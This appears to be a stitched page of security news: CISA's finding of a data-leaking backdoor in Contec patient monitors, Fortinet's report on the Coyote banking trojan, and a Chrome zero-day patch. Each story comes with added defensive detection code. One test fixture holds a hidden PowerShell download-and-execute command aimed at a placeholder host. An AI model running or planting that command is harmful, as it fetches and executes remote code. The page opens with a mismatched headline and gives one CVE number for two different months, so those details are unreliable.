Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
Backdoor found in two healthcare patient monitors, linked to IP in China

The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitor, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device.
Contec is a China-based company that specializes in healthcare technology, offering a range of medical devices including patient monitoring systems, diagnostic equipment, and laboratory instruments.
CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, it found anomalous network traffic to a hard-coded external IP address that is not associated with the company but with a university.
This led to the discovery of a backdoor in the company's firmware that quietly downloads and executes files on the device, allowing remote code execution and complete takeover of the patient monitors. CISA also found that the device quietly sends patient data to the same hard-coded address when it starts up.
None of this activity is logged, so it proceeds without alerting the devices' administrators.
While CISA did not name the university and redacted the IP address, the address has been linked to a Chinese university. The same IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another Chinese healthcare manufacturer.
An FDA advisory about the backdoor also confirmed that it was found in Epsimed MN-120 patient monitors, which are re-labeled Contec CMS8000 devices.
On analyzing the firmware, CISA found that one of the device's executables, 'monitor,' contains a backdoor that issues a series of Linux commands that enable the device's network adapter (eth0) and then attempts to mount a remote NFS share at the hard-coded IP address belonging to the university.
The NFS share is mounted at /mnt/ and the backdoor recursively copies the files from the /mnt/ folder to the /opt/bin folder.
The backdoor will continue to copy files from /opt/bin to the /opt folder and, when done, unmount the remote NFS share.
"Though the /opt/bin directory is not part of default Linux installations, it is nonetheless a common Linux directory structure," explains CISA's advisory.
"Generally, Linux stores third-party software installations in the /opt directory and third-party binaries in the /opt/bin directory. The ability to overwrite files within the /opt/bin directory provides a powerful primitive for remotely taking over the device and remotely altering the device configuration."
"Additionally, the use of symbolic links could provide a primitive to overwrite files anywhere on the device filesystem. When executed, this function offers a formidable primitive allowing for a third-party operating at the hard-coded IP address to potentially take full control of the device remotely."
While CISA has not shared what these files do on the device, the agency said it detected no communication between the devices and the hard-coded IP address, only attempts to connect to it.
CISA says that after reviewing the firmware, it does not believe this is an automatic update feature, but rather a backdoor planted in the device's firmware.
"By reviewing the firmware code, the team determined that the functionality is very unlikely to be an alternative update mechanism, exhibiting highly unusual characteristics that do not support the implementation of a traditional update feature. For example, the function provides neither an integrity-checking mechanism nor version tracking of updates. When the function is executed, files on the device are forcibly overwritten, preventing the end customer—such as a hospital—from maintaining awareness of what software is running on the device. These types of actions and the lack of critical log/auditing data go against generally accepted practices and ignore essential components for properly managed system updates, especially for medical devices."
Further supporting the conclusion that this is a backdoor by design, CISA found that the devices also began sending patient data to the remote IP address when they started.
CISA says that patient data is typically transmitted across a network using the Health Level 7 (HL7) protocol. However, these devices sent the data to the remote IP over port 515, which is usually associated with the Line Printer Daemon (LPD) protocol.
The transmitted data includes the doctor's name, patient ID, patient's name, patient's date of birth, and other information.
Patient data sent to remote IP address in China.
After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.
However, each one still contained the malicious code; the company had simply disabled the 'eth0' network adapter to mitigate the backdoor. This mitigation does not help, as the script specifically enables the adapter with the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.
Currently, there is no available patch for devices that removes the backdoor, and CISA recommends that all healthcare organizations disconnect these devices from the network if possible.
Furthermore, the cybersecurity agency recommends organizations check their Contec CMS8000 patient monitors for any signs of tampering, such as displaying information different from a patient's physical state.
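The behaviors CISA describes (a monitor bringing up eth0, mounting an NFS share at an external hard-coded address, and sending patient data over port 515 at startup) leave no trace on the device, but they are visible on the network. The Python below is an added example, not CISA's or Contec's code: it runs over constructed flow records in an assumed 'ts src dst dport proto' format and flags monitor-initiated connections to external hosts on the portmapper, NFS and LPD ports; the monitor inventory and all addresses are constructed, with 203.0.113.7 standing in for the redacted IP.

```python
"""Flag patient-monitor traffic matching the Contec CMS8000 backdoor CISA describes:
outbound NFS to an external hard-coded host and patient data sent over TCP 515 (LPD).

Added example for this article, not CISA's or Contec's code. The flow-record format,
the monitor inventory and the sample records below are all constructed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Constructed inventory: addresses of the patient monitors on the clinical VLAN.
MONITOR_HOSTS = {"10.20.5.11", "10.20.5.12"}

# Ports tied to the described behavior: NFS (2049) and the portmapper it relies on
# (111) for the remote file copy, and LPD (515), which carried the patient data.
SUSPECT_PORTS = {111: "portmapper", 2049: "NFS", 515: "LPD/port 515"}

# Explicit internal ranges (RFC 1918 plus loopback and link-local). ipaddress's
# is_private is not used because it also covers the 203.0.113.0/24 range used below.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    port: int
    reason: str

def parse_conn_line(line: str) -> tuple[str, str, int, str] | None:
    """Parse one constructed flow record of the form 'ts src dst dport proto'."""
    parts = line.split()
    if len(parts) != 5 or not parts[3].isdigit():
        return None
    _ts, src, dst, dport, proto = parts
    return src, dst, int(dport), proto

def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def detect_backdoor_traffic(lines, monitors=MONITOR_HOSTS) -> list[Alert]:
    """Return an Alert for every monitor-initiated flow to an external host on a
    suspect port. Internal NFS and non-monitor sources are left alone."""
    alerts = []
    for line in lines:
        rec = parse_conn_line(line)
        if rec is None or rec[0] not in monitors:
            continue
        src, dst, dport, _proto = rec
        if dport in SUSPECT_PORTS and is_external(dst):
            if dport == 515:
                reason = "patient data path: monitor -> external host over LPD, not HL7"
            else:
                reason = f"remote file copy path: monitor -> external {SUSPECT_PORTS[dport]}"
            alerts.append(Alert(src, dst, dport, reason))
    return alerts

# Constructed sample records; 203.0.113.7 (a documentation range) stands in for the
# redacted hard-coded address in the advisory.
SAMPLE_LOG = [
    "1706745600 10.20.5.11 203.0.113.7 111 tcp",
    "1706745601 10.20.5.11 203.0.113.7 2049 tcp",
    "1706745602 10.20.5.11 203.0.113.7 515 tcp",
    "1706745603 10.20.5.12 10.20.9.40 2049 tcp",  # internal NFS: not flagged
    "1706745604 10.20.7.50 203.0.113.7 515 tcp",  # not a monitor: not flagged
    "1706745605 10.20.5.12 203.0.113.7 443 tcp",  # other port: out of scope here
]

if __name__ == "__main__":
    for a in detect_backdoor_traffic(SAMPLE_LOG):
        print(f"{a.src} -> {a.dst}:{a.port}  {a.reason}")
```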
BleepingComputer contacted Contec with questions about the firmware and will update the story if we receive a response.
Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote.
"Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis.
The cybersecurity firm said it discovered over the past month several Windows Shortcut (LNK) file artifacts that contain PowerShell commands responsible for delivering the malware.
Coyote was first documented by Kaspersky in early 2024, detailing its attacks targeting customers in the South American nation. It's capable of harvesting sensitive information from over 70 financial applications.
In the previous attack chain documented by the Russian cybersecurity firm, a Squirrel installer executable is used to trigger a [website] application compiled with Electron, which in turn runs a Nim-based loader to trigger the execution of the malicious Coyote payload.
The latest infection sequence, on the other hand, commences with an LNK file that executes a PowerShell command to retrieve the next stage from a remote server ("tbet.geontrigame[.]com"): another PowerShell script that launches a loader responsible for executing an interim payload.
"The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads," Lin said. "The decrypted MSIL execution file first establishes persistence by modifying the registry at 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run.'"
"If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry contains a customized PowerShell command pointing to download and execute a Base64-encoded URL, which facilitates the main functions of the Coyote banking trojan."
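The persistence step Lin describes, a randomly named Run value whose data is a PowerShell command that decodes a Base64-encoded URL and downloads from it, can be triaged from an exported copy of that key. The Python below is an added example rather than Fortinet's or Kaspersky's code; the Run-key export, the value names and the example.invalid URL are constructed, and the heuristics (download/execute cues, Base64 tokens that decode to a URL, high-entropy value names) are my own assumptions about what such an entry looks like.

```python
"""Triage Run-key autostart values for the Coyote persistence pattern Lin describes:
a randomly named value whose data is a PowerShell command that decodes a Base64-encoded
URL and downloads from it. Added example for this article, not Fortinet's or Kaspersky's
code; the Run-key export below is constructed and nothing here reads the live registry."""
import base64
import math
import re

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
PS_LAUNCHER = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
DOWNLOAD_CUES = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
                           r"|Invoke-RestMethod|\birm\b|Net\.WebClient|Start-BitsTransfer", re.I)
EXEC_CUES = re.compile(r"\biex\b|Invoke-Expression", re.I)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def shannon_entropy(s):
    """Bits per character; generated alphanumeric names score well above 3."""
    if not s:
        return 0.0
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def looks_random(name):
    """Generated-name heuristic: one alphanumeric token of 8+ chars mixing letters
    and digits with high entropy. Vendor names like 'OneDrive' do not pass."""
    return (re.fullmatch(r"[A-Za-z0-9]{8,}", name) is not None
            and re.search(r"\d", name) is not None
            and re.search(r"[A-Za-z]", name) is not None
            and shannon_entropy(name) > 3.0)

def decoded_urls(command):
    """Decode Base64-looking tokens in the command and return those that yield a URL."""
    urls = []
    for token in B64_TOKEN.findall(command):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error subclasses ValueError
            continue
        for enc in ("utf-8", "utf-16-le"):  # -EncodedCommand payloads are UTF-16LE
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if re.match(r"https?://", text):
                urls.append(text)
                break
    return urls

def triage_run_entries(entries):
    """One finding per Run value where at least two independent cues fire."""
    findings = []
    for name, data in entries.items():
        reasons = []
        if PS_LAUNCHER.search(data):
            if DOWNLOAD_CUES.search(data):
                reasons.append("PowerShell download cue")
            if EXEC_CUES.search(data):
                reasons.append("PowerShell execute cue")
            for url in decoded_urls(data)[:1]:
                reasons.append(f"Base64-encoded URL decodes to {url}")
        if looks_random(name):
            reasons.append("random-looking value name")
        if len(reasons) >= 2:
            findings.append({"key": RUN_KEY, "name": name, "reasons": reasons})
    return findings

# Constructed Run-key export: one benign vendor entry and one Coyote-style entry whose
# Base64 token decodes to the placeholder URL http://example.invalid/stage.
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\ana\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Xk7qv2LmT9": 'powershell.exe -w hidden -nop -c "iex (iwr ([Text.Encoding]::UTF8.GetString('
                  "[Convert]::FromBase64String('aHR0cDovL2V4YW1wbGUuaW52YWxpZC9zdGFnZQ=='))))\"",
}
```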
The malware, once launched, gathers basic system information and the list of installed antivirus products on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
A notable change in the latest iteration of Coyote is the expansion of its target list to encompass 1,030 sites and 73 financial institutions, such as [website], [website], [website], [website], [website], and [website].
Should the victim attempt to access any one of the sites in the list, the malware contacts an attacker-controlled server to determine the next course of action, which can range from capturing a screenshot to serving overlays. Other functions include activating a keylogger and manipulating display settings.
"Coyote's infection process is complex and multi-staged," Lin said. "This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets."
Google Patches Chrome’s Fifth Zero-Day of the Year

An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
Google has patched the fifth actively exploited zero-day vulnerability discovered in Chrome this year as one in a series of fixes included in a stable channel update released Wednesday.
The bug, tracked as CVE-2022-2856 and rated as high on the Common Vulnerability Scoring System (CVSS), is associated with “insufficient validation of untrusted input in Intents,” according to Google.
Google credits Ashley Shen and Christian Resell of its Threat Analysis Group (TAG) for reporting the zero-day bug, which could allow for arbitrary code execution, on July 19. The advisory also detailed 10 other patches for various other Chrome issues.
Intents are a deep-linking feature of Chrome on Android that replaced URI schemes, which previously handled this process, according to a company that offers linking options for mobile applications.
“Instead of assigning window.location or an [website] to the URI scheme, in Chrome, developers need to use their intent string as defined in this document,” the company explained on its website. Intent “adds complexity” but “automatically handles the case of the mobile app not being installed” within links.
Insufficient validation relates to input validation, a frequently used technique for checking potentially dangerous inputs to ensure that they are safe for processing within the code or when communicating with other components, according to the Common Weakness Enumeration (CWE) site.
“When software does not validate input properly, an attacker is able to craft the input in a form that is not expected by the rest of the application,” the CWE entry explains. “This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.”
As is typical, Google is withholding specific details of the bug until the fix is widely deployed, to avoid threat actors taking further advantage of it, a strategy that one security professional called wise.
“Publicizing details on an actively exploited zero-day vulnerability just as a patch becomes available could have dire consequences, because it takes time to roll out security updates to vulnerable systems and attackers are champing at the bit to exploit these types of flaws,” observed Satnam Narang, senior staff research engineer at cybersecurity firm Tenable, in an email to Threatpost.
Holding back information is also sound given that other Linux distributions and browsers, such as Microsoft Edge, also include code based on Google’s Chromium Project. These all could be affected if an exploit for a vulnerability is released, he noted.
“It is extremely valuable for defenders to have that buffer,” Narang added.
While the majority of the fixes in the update are for vulnerabilities rated as high or medium risk, Google did patch a critical bug tracked as CVE-2022-2852, a use-after-free issue in FedCM. FedCM, short for the Federated Credential Management API, provides a use-case-specific abstraction for federated identity flows on the web.
The zero-day patch is the fifth Chrome bug under active attack that Google has patched so far this year.
In July, the organization fixed an actively exploited heap buffer overflow flaw tracked as CVE-2022-2294 in WebRTC, the engine that gives Chrome its real-time communications capability, while in May it was a separate buffer overflow flaw tracked as CVE-2022-2294 and under active attack that got slapped with a patch.
In April, Google patched CVE-2022-1364, a type confusion flaw affecting Chrome’s use of the V8 JavaScript engine on which attackers already had pounced. The previous month a separate type-confusion issue in V8 tracked as CVE-2022-1096 and under active attack also spurred a hasty patch.
February saw a fix for the first of this year’s Chrome zero-days, a use-after-free flaw in Chrome’s Animation component tracked as CVE-2022-0609 that already was under attack. Later it was revealed that North Korean hackers were exploiting the flaw weeks before it was discovered and patched.